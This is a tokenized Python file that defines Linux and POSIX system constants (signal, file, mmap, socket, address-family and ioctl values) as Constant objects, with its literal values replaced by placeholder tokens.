SA_RESETHAND = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SA_NOMASK = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SA_ONESHOT = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SS_ONSTACK = Constant ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> SS_DISABLE = Constant ( '<STR_LIT>' , <NUM_LIT:2> ) <EOL> MINSIGSTKSZ = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIGSTKSZ = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIG_BLOCK = Constant ( '<STR_LIT>' , <NUM_LIT:0> ) <EOL> SIG_UNBLOCK = Constant ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> SIG_SETMASK = Constant ( '<STR_LIT>' , <NUM_LIT:2> ) <EOL> SI_MAX_SIZE = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIGEV_SIGNAL = Constant ( '<STR_LIT>' , <NUM_LIT:0> ) <EOL> SIGEV_NONE = Constant ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> SIGEV_THREAD = Constant ( '<STR_LIT>' , <NUM_LIT:2> ) <EOL> SIGEV_THREAD_ID = Constant ( '<STR_LIT>' , <NUM_LIT:4> ) <EOL> SIGEV_MAX_SIZE = Constant ( '<STR_LIT>' , <NUM_LIT:64> ) <EOL> _SYS_TIME_H = Constant ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> ITIMER_REAL = Constant ( '<STR_LIT>' , <NUM_LIT:0> ) <EOL> ITIMER_VIRTUAL = Constant ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> ITIMER_PROF = Constant ( '<STR_LIT>' , <NUM_LIT:2> ) <EOL> X86_FXSR_MAGIC = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> FD_SETSIZE = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> R_OK = Constant ( '<STR_LIT>' , <NUM_LIT:4> ) <EOL> W_OK = Constant ( '<STR_LIT>' , <NUM_LIT:2> ) <EOL> X_OK = Constant ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> F_OK = Constant ( '<STR_LIT>' , <NUM_LIT:0> ) <EOL> SEEK_SET = Constant ( '<STR_LIT>' , <NUM_LIT:0> ) <EOL> SEEK_CUR = Constant ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> SEEK_END = Constant ( '<STR_LIT>' , <NUM_LIT:2> ) <EOL> STDIN_FILENO = Constant ( '<STR_LIT>' , <NUM_LIT:0> ) <EOL> STDOUT_FILENO = Constant ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> STDERR_FILENO = Constant ( '<STR_LIT>' , <NUM_LIT:2> ) <EOL> _CS_PATH = Constant ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> _SC_CLK_TCK = Constant ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> _SC_ARG_MAX = Constant ( '<STR_LIT>' , 
<NUM_LIT:2> ) <EOL> _SC_NGROUPS_MAX = Constant ( '<STR_LIT>' , <NUM_LIT:3> ) <EOL> _SC_OPEN_MAX = Constant ( '<STR_LIT>' , <NUM_LIT:4> ) <EOL> _SC_PAGESIZE = Constant ( '<STR_LIT>' , <NUM_LIT:5> ) <EOL> _SC_NPROCESSORS_ONLN = Constant ( '<STR_LIT>' , <NUM_LIT:6> ) <EOL> _SC_NPROCESSORS_CONF = Constant ( '<STR_LIT>' , <NUM_LIT:6> ) <EOL> _SC_PHYS_PAGES = Constant ( '<STR_LIT>' , <NUM_LIT:7> ) <EOL> _PC_PATH_MAX = Constant ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> _PC_VDISABLE = Constant ( '<STR_LIT>' , <NUM_LIT:2> ) <EOL> L_cuserid = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> _POSIX_VERSION = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> F_ULOCK = Constant ( '<STR_LIT>' , <NUM_LIT:0> ) <EOL> F_LOCK = Constant ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> F_TLOCK = Constant ( '<STR_LIT>' , <NUM_LIT:2> ) <EOL> F_TEST = Constant ( '<STR_LIT>' , <NUM_LIT:3> ) <EOL> STAT64_HAS_BROKEN_ST_INO = Constant ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> S_IFMT = Constant ( '<STR_LIT>' , <NUM_LIT> <NUM_LIT> ) <EOL> S_IFSOCK = Constant ( '<STR_LIT>' , <NUM_LIT:0> <NUM_LIT> ) <EOL> S_IFLNK = Constant ( '<STR_LIT>' , <NUM_LIT:0> <NUM_LIT> ) <EOL> S_IFREG = Constant ( '<STR_LIT>' , <NUM_LIT:0> <NUM_LIT> ) <EOL> S_IFBLK = Constant ( '<STR_LIT>' , <NUM_LIT> <NUM_LIT> ) <EOL> S_IFDIR = Constant ( '<STR_LIT>' , <NUM_LIT> <NUM_LIT> ) <EOL> S_IFCHR = Constant ( '<STR_LIT>' , <NUM_LIT> <NUM_LIT> ) <EOL> S_IFIFO = Constant ( '<STR_LIT>' , <NUM_LIT> <NUM_LIT> ) <EOL> S_ISUID = Constant ( '<STR_LIT>' , <NUM_LIT> <NUM_LIT> ) <EOL> S_ISGID = Constant ( '<STR_LIT>' , <NUM_LIT> <NUM_LIT> ) <EOL> S_ISVTX = Constant ( '<STR_LIT>' , <NUM_LIT> <NUM_LIT:1000> ) <EOL> S_IRWXU = Constant ( '<STR_LIT>' , <NUM_LIT> <NUM_LIT> ) <EOL> S_IRUSR = Constant ( '<STR_LIT>' , <NUM_LIT> <NUM_LIT> ) <EOL> S_IWUSR = Constant ( '<STR_LIT>' , <NUM_LIT> <NUM_LIT:200> ) <EOL> S_IXUSR = Constant ( '<STR_LIT>' , <NUM_LIT> <NUM_LIT:100> ) <EOL> S_IRWXG = Constant ( '<STR_LIT>' , <NUM_LIT> <NUM_LIT> ) <EOL> S_IRGRP = Constant ( '<STR_LIT>' , <NUM_LIT> 
<NUM_LIT> ) <EOL> S_IWGRP = Constant ( '<STR_LIT>' , <NUM_LIT> <NUM_LIT:20> ) <EOL> S_IXGRP = Constant ( '<STR_LIT>' , <NUM_LIT> <NUM_LIT:10> ) <EOL> S_IRWXO = Constant ( '<STR_LIT>' , <NUM_LIT> <NUM_LIT:7> ) <EOL> S_IROTH = Constant ( '<STR_LIT>' , <NUM_LIT> <NUM_LIT:4> ) <EOL> S_IWOTH = Constant ( '<STR_LIT>' , <NUM_LIT> <NUM_LIT:2> ) <EOL> S_IXOTH = Constant ( '<STR_LIT>' , <NUM_LIT> <NUM_LIT:1> ) <EOL> S_IREAD = Constant ( '<STR_LIT>' , <NUM_LIT> <NUM_LIT> ) <EOL> S_IWRITE = Constant ( '<STR_LIT>' , <NUM_LIT> <NUM_LIT:200> ) <EOL> S_IEXEC = Constant ( '<STR_LIT>' , <NUM_LIT> <NUM_LIT:100> ) <EOL> F_LINUX_SPECIFIC_BASE = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> O_ACCMODE = Constant ( '<STR_LIT>' , <NUM_LIT> <NUM_LIT:3> ) <EOL> O_RDONLY = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> O_WRONLY = Constant ( '<STR_LIT>' , <NUM_LIT:0> <NUM_LIT:1> ) <EOL> O_RDWR = Constant ( '<STR_LIT>' , <NUM_LIT:0> <NUM_LIT:2> ) <EOL> O_CREAT = Constant ( '<STR_LIT>' , <NUM_LIT:0> <NUM_LIT:100> ) <EOL> O_EXCL = Constant ( '<STR_LIT>' , <NUM_LIT:0> <NUM_LIT:200> ) <EOL> O_NOCTTY = Constant ( '<STR_LIT>' , <NUM_LIT:0> <NUM_LIT> ) <EOL> O_TRUNC = Constant ( '<STR_LIT>' , <NUM_LIT:0> <NUM_LIT:1000> ) <EOL> O_APPEND = Constant ( '<STR_LIT>' , <NUM_LIT:0> <NUM_LIT> ) <EOL> O_NONBLOCK = Constant ( '<STR_LIT>' , <NUM_LIT:0> <NUM_LIT> ) <EOL> O_NDELAY = Constant ( '<STR_LIT>' , <NUM_LIT:0> <NUM_LIT> ) <EOL> O_SYNC = Constant ( '<STR_LIT>' , <NUM_LIT:0> <NUM_LIT> ) <EOL> FASYNC = Constant ( '<STR_LIT>' , <NUM_LIT:0> <NUM_LIT> ) <EOL> O_DIRECT = Constant ( '<STR_LIT>' , <NUM_LIT:0> <NUM_LIT> ) <EOL> O_LARGEFILE = Constant ( '<STR_LIT>' , <NUM_LIT:0> <NUM_LIT> ) <EOL> O_DIRECTORY = Constant ( '<STR_LIT>' , <NUM_LIT:0> <NUM_LIT> ) <EOL> O_NOFOLLOW = Constant ( '<STR_LIT>' , <NUM_LIT:0> <NUM_LIT> ) <EOL> O_NOATIME = Constant ( '<STR_LIT>' , <NUM_LIT:0> <NUM_LIT> ) <EOL> F_DUPFD = Constant ( '<STR_LIT>' , <NUM_LIT:0> ) <EOL> F_GETFD = Constant ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> F_SETFD = Constant 
( '<STR_LIT>' , <NUM_LIT:2> ) <EOL> F_GETFL = Constant ( '<STR_LIT>' , <NUM_LIT:3> ) <EOL> F_SETFL = Constant ( '<STR_LIT>' , <NUM_LIT:4> ) <EOL> F_GETLK = Constant ( '<STR_LIT>' , <NUM_LIT:5> ) <EOL> F_SETLK = Constant ( '<STR_LIT>' , <NUM_LIT:6> ) <EOL> F_SETLKW = Constant ( '<STR_LIT>' , <NUM_LIT:7> ) <EOL> F_SETOWN = Constant ( '<STR_LIT>' , <NUM_LIT:8> ) <EOL> F_GETOWN = Constant ( '<STR_LIT>' , <NUM_LIT:9> ) <EOL> F_SETSIG = Constant ( '<STR_LIT>' , <NUM_LIT:10> ) <EOL> F_GETSIG = Constant ( '<STR_LIT>' , <NUM_LIT:11> ) <EOL> F_GETLK64 = Constant ( '<STR_LIT>' , <NUM_LIT:12> ) <EOL> F_SETLK64 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> F_SETLKW64 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> FD_CLOEXEC = Constant ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> F_RDLCK = Constant ( '<STR_LIT>' , <NUM_LIT:0> ) <EOL> F_WRLCK = Constant ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> F_UNLCK = Constant ( '<STR_LIT>' , <NUM_LIT:2> ) <EOL> F_EXLCK = Constant ( '<STR_LIT>' , <NUM_LIT:4> ) <EOL> F_SHLCK = Constant ( '<STR_LIT>' , <NUM_LIT:8> ) <EOL> F_INPROGRESS = Constant ( '<STR_LIT>' , <NUM_LIT:16> ) <EOL> LOCK_SH = Constant ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> LOCK_EX = Constant ( '<STR_LIT>' , <NUM_LIT:2> ) <EOL> LOCK_NB = Constant ( '<STR_LIT>' , <NUM_LIT:4> ) <EOL> LOCK_UN = Constant ( '<STR_LIT>' , <NUM_LIT:8> ) <EOL> LOCK_MAND = Constant ( '<STR_LIT>' , <NUM_LIT:32> ) <EOL> LOCK_READ = Constant ( '<STR_LIT>' , <NUM_LIT:64> ) <EOL> LOCK_WRITE = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> LOCK_RW = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> O_ASYNC = Constant ( '<STR_LIT>' , <NUM_LIT:0> <NUM_LIT> ) <EOL> MREMAP_MAYMOVE = Constant ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> MREMAP_FIXED = Constant ( '<STR_LIT>' , <NUM_LIT:2> ) <EOL> PROT_READ = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> PROT_WRITE = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> PROT_EXEC = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> PROT_NONE = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> MAP_SHARED = Constant ( '<STR_LIT>' , 
<NUM_LIT> ) <EOL> MAP_PRIVATE = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> MAP_FIXED = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> MAP_ANONYMOUS = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> MAP_GROWSDOWN = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> MAP_DENYWRITE = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> MAP_EXECUTABLE = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> MAP_LOCKED = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> MAP_NORESERVE = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> MAP_POPULATE = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> MS_ASYNC = Constant ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> MS_INVALIDATE = Constant ( '<STR_LIT>' , <NUM_LIT:2> ) <EOL> MS_SYNC = Constant ( '<STR_LIT>' , <NUM_LIT:4> ) <EOL> MCL_CURRENT = Constant ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> MCL_FUTURE = Constant ( '<STR_LIT>' , <NUM_LIT:2> ) <EOL> MADV_NORMAL = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> MADV_RANDOM = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> MADV_SEQUENTIAL = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> MADV_WILLNEED = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> MADV_DONTNEED = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> MAP_ANON = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> MAP_FILE = Constant ( '<STR_LIT>' , <NUM_LIT:0> ) <EOL> SOL_SOCKET = Constant ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> SO_DEBUG = Constant ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> SO_REUSEADDR = Constant ( '<STR_LIT>' , <NUM_LIT:2> ) <EOL> SO_TYPE = Constant ( '<STR_LIT>' , <NUM_LIT:3> ) <EOL> SO_ERROR = Constant ( '<STR_LIT>' , <NUM_LIT:4> ) <EOL> SO_DONTROUTE = Constant ( '<STR_LIT>' , <NUM_LIT:5> ) <EOL> SO_BROADCAST = Constant ( '<STR_LIT>' , <NUM_LIT:6> ) <EOL> SO_SNDBUF = Constant ( '<STR_LIT>' , <NUM_LIT:7> ) <EOL> SO_RCVBUF = Constant ( '<STR_LIT>' , <NUM_LIT:8> ) <EOL> SO_KEEPALIVE = Constant ( '<STR_LIT>' , <NUM_LIT:9> ) <EOL> SO_OOBINLINE = Constant ( '<STR_LIT>' , <NUM_LIT:10> ) <EOL> SO_NO_CHECK = Constant ( '<STR_LIT>' , <NUM_LIT:11> ) <EOL> SO_PRIORITY = Constant ( '<STR_LIT>' , <NUM_LIT:12> ) <EOL> 
SO_LINGER = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SO_BSDCOMPAT = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SO_PASSCRED = Constant ( '<STR_LIT>' , <NUM_LIT:16> ) <EOL> SO_PEERCRED = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SO_RCVLOWAT = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SO_SNDLOWAT = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SO_RCVTIMEO = Constant ( '<STR_LIT>' , <NUM_LIT:20> ) <EOL> SO_SNDTIMEO = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SO_ACCEPTCONN = Constant ( '<STR_LIT>' , <NUM_LIT:30> ) <EOL> SO_SNDBUFFORCE = Constant ( '<STR_LIT>' , <NUM_LIT:32> ) <EOL> SO_RCVBUFFORCE = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SO_SECURITY_AUTHENTICATION = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SO_SECURITY_ENCRYPTION_TRANSPORT = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SO_SECURITY_ENCRYPTION_NETWORK = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SO_BINDTODEVICE = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SO_ATTACH_FILTER = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SO_DETACH_FILTER = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SO_PEERNAME = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SO_TIMESTAMP = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SCM_TIMESTAMP = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SOCK_STREAM = Constant ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> SOCK_DGRAM = Constant ( '<STR_LIT>' , <NUM_LIT:2> ) <EOL> SOCK_RAW = Constant ( '<STR_LIT>' , <NUM_LIT:3> ) <EOL> SOCK_RDM = Constant ( '<STR_LIT>' , <NUM_LIT:4> ) <EOL> SOCK_SEQPACKET = Constant ( '<STR_LIT>' , <NUM_LIT:5> ) <EOL> SOCK_PACKET = Constant ( '<STR_LIT>' , <NUM_LIT:10> ) <EOL> UIO_FASTIOV = Constant ( '<STR_LIT>' , <NUM_LIT:8> ) <EOL> UIO_MAXIOV = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SCM_RIGHTS = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SCM_CREDENTIALS = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SCM_CONNECT = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> AF_UNSPEC = Constant ( '<STR_LIT>' , <NUM_LIT:0> ) <EOL> AF_UNIX = Constant ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> AF_LOCAL = 
Constant ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> AF_INET = Constant ( '<STR_LIT>' , <NUM_LIT:2> ) <EOL> AF_AX25 = Constant ( '<STR_LIT>' , <NUM_LIT:3> ) <EOL> AF_IPX = Constant ( '<STR_LIT>' , <NUM_LIT:4> ) <EOL> AF_APPLETALK = Constant ( '<STR_LIT>' , <NUM_LIT:5> ) <EOL> AF_NETROM = Constant ( '<STR_LIT>' , <NUM_LIT:6> ) <EOL> AF_BRIDGE = Constant ( '<STR_LIT>' , <NUM_LIT:7> ) <EOL> AF_ATMPVC = Constant ( '<STR_LIT>' , <NUM_LIT:8> ) <EOL> AF_X25 = Constant ( '<STR_LIT>' , <NUM_LIT:9> ) <EOL> AF_INET6 = Constant ( '<STR_LIT>' , <NUM_LIT:10> ) <EOL> AF_ROSE = Constant ( '<STR_LIT>' , <NUM_LIT:11> ) <EOL> AF_DECnet = Constant ( '<STR_LIT>' , <NUM_LIT:12> ) <EOL> AF_NETBEUI = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> AF_SECURITY = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> AF_KEY = Constant ( '<STR_LIT>' , <NUM_LIT:15> ) <EOL> AF_NETLINK = Constant ( '<STR_LIT>' , <NUM_LIT:16> ) <EOL> AF_ROUTE = Constant ( '<STR_LIT>' , <NUM_LIT:16> ) <EOL> AF_PACKET = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> AF_ASH = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> AF_ECONET = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> AF_ATMSVC = Constant ( '<STR_LIT>' , <NUM_LIT:20> ) <EOL> AF_SNA = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> AF_IRDA = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> AF_PPPOX = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> AF_WANPIPE = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> AF_MAX = Constant ( '<STR_LIT>' , <NUM_LIT:32> ) <EOL> PF_UNSPEC = Constant ( '<STR_LIT>' , <NUM_LIT:0> ) <EOL> PF_UNIX = Constant ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> PF_LOCAL = Constant ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> PF_INET = Constant ( '<STR_LIT>' , <NUM_LIT:2> ) <EOL> PF_AX25 = Constant ( '<STR_LIT>' , <NUM_LIT:3> ) <EOL> PF_IPX = Constant ( '<STR_LIT>' , <NUM_LIT:4> ) <EOL> PF_APPLETALK = Constant ( '<STR_LIT>' , <NUM_LIT:5> ) <EOL> PF_NETROM = Constant ( '<STR_LIT>' , <NUM_LIT:6> ) <EOL> PF_BRIDGE = Constant ( '<STR_LIT>' , <NUM_LIT:7> ) <EOL> PF_ATMPVC = Constant ( '<STR_LIT>' , <NUM_LIT:8> ) 
<EOL> PF_X25 = Constant ( '<STR_LIT>' , <NUM_LIT:9> ) <EOL> PF_INET6 = Constant ( '<STR_LIT>' , <NUM_LIT:10> ) <EOL> PF_ROSE = Constant ( '<STR_LIT>' , <NUM_LIT:11> ) <EOL> PF_DECnet = Constant ( '<STR_LIT>' , <NUM_LIT:12> ) <EOL> PF_NETBEUI = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> PF_SECURITY = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> PF_KEY = Constant ( '<STR_LIT>' , <NUM_LIT:15> ) <EOL> PF_NETLINK = Constant ( '<STR_LIT>' , <NUM_LIT:16> ) <EOL> PF_ROUTE = Constant ( '<STR_LIT>' , <NUM_LIT:16> ) <EOL> PF_PACKET = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> PF_ASH = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> PF_ECONET = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> PF_ATMSVC = Constant ( '<STR_LIT>' , <NUM_LIT:20> ) <EOL> PF_SNA = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> PF_IRDA = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> PF_PPPOX = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> PF_WANPIPE = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> PF_MAX = Constant ( '<STR_LIT>' , <NUM_LIT:32> ) <EOL> SOMAXCONN = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> MSG_OOB = Constant ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> MSG_PEEK = Constant ( '<STR_LIT>' , <NUM_LIT:2> ) <EOL> MSG_DONTROUTE = Constant ( '<STR_LIT>' , <NUM_LIT:4> ) <EOL> MSG_TRYHARD = Constant ( '<STR_LIT>' , <NUM_LIT:4> ) <EOL> MSG_CTRUNC = Constant ( '<STR_LIT>' , <NUM_LIT:8> ) <EOL> MSG_PROBE = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> MSG_TRUNC = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> MSG_DONTWAIT = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> MSG_EOR = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> MSG_WAITALL = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> MSG_FIN = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> MSG_EOF = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> MSG_SYN = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> MSG_CONFIRM = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> MSG_RST = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> MSG_ERRQUEUE = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> MSG_NOSIGNAL = Constant ( '<STR_LIT>' , 
<NUM_LIT> ) <EOL> MSG_MORE = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SOL_IP = Constant ( '<STR_LIT>' , <NUM_LIT:0> ) <EOL> SOL_TCP = Constant ( '<STR_LIT>' , <NUM_LIT:6> ) <EOL> SOL_UDP = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SOL_IPV6 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SOL_ICMPV6 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SOL_RAW = Constant ( '<STR_LIT>' , <NUM_LIT:255> ) <EOL> SOL_IPX = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SOL_AX25 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SOL_ATALK = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SOL_NETROM = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SOL_ROSE = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SOL_DECNET = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SOL_X25 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SOL_PACKET = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SOL_ATM = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SOL_AAL = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SOL_IRDA = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> IPX_TYPE = Constant ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> SHUT_RD = Constant ( '<STR_LIT>' , <NUM_LIT:0> ) <EOL> SHUT_WR = Constant ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> SHUT_RDWR = Constant ( '<STR_LIT>' , <NUM_LIT:2> ) <EOL> NI_NOFQDN = Constant ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> NI_NUMERICHOST = Constant ( '<STR_LIT>' , <NUM_LIT:2> ) <EOL> NI_NAMEREQD = Constant ( '<STR_LIT>' , <NUM_LIT:4> ) <EOL> NI_NUMERICSERV = Constant ( '<STR_LIT>' , <NUM_LIT:8> ) <EOL> NI_DGRAM = Constant ( '<STR_LIT>' , <NUM_LIT:16> ) <EOL> EAI_FAMILY = Constant ( '<STR_LIT>' , - <NUM_LIT:1> ) <EOL> EAI_SOCKTYPE = Constant ( '<STR_LIT>' , - <NUM_LIT:2> ) <EOL> EAI_BADFLAGS = Constant ( '<STR_LIT>' , - <NUM_LIT:3> ) <EOL> EAI_NONAME = Constant ( '<STR_LIT>' , - <NUM_LIT:4> ) <EOL> EAI_SERVICE = Constant ( '<STR_LIT>' , - <NUM_LIT:5> ) <EOL> EAI_ADDRFAMILY = Constant ( '<STR_LIT>' , - <NUM_LIT:6> ) <EOL> EAI_NODATA = Constant ( '<STR_LIT>' , - <NUM_LIT:7> ) <EOL> EAI_MEMORY = Constant ( '<STR_LIT>' , - <NUM_LIT:8> 
) <EOL> EAI_FAIL = Constant ( '<STR_LIT>' , - <NUM_LIT:9> ) <EOL> EAI_AGAIN = Constant ( '<STR_LIT>' , - <NUM_LIT:10> ) <EOL> EAI_SYSTEM = Constant ( '<STR_LIT>' , - <NUM_LIT:11> ) <EOL> AI_NUMERICHOST = Constant ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> AI_CANONNAME = Constant ( '<STR_LIT>' , <NUM_LIT:2> ) <EOL> AI_PASSIVE = Constant ( '<STR_LIT>' , <NUM_LIT:4> ) <EOL> SIOCADDRT = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCDELRT = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCRTMSG = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCGIFNAME = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCSIFLINK = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCGIFCONF = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCGIFFLAGS = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCSIFFLAGS = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCGIFADDR = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCSIFADDR = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCGIFDSTADDR = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCSIFDSTADDR = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCGIFBRDADDR = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCSIFBRDADDR = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCGIFNETMASK = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCSIFNETMASK = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCGIFMETRIC = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCSIFMETRIC = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCGIFMEM = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCSIFMEM = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCGIFMTU = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCSIFMTU = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCSIFNAME = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCSIFHWADDR = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCGIFENCAP = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIOCSIFENCAP = Constant ( '<STR_LIT>' , <NUM_LIT> ) 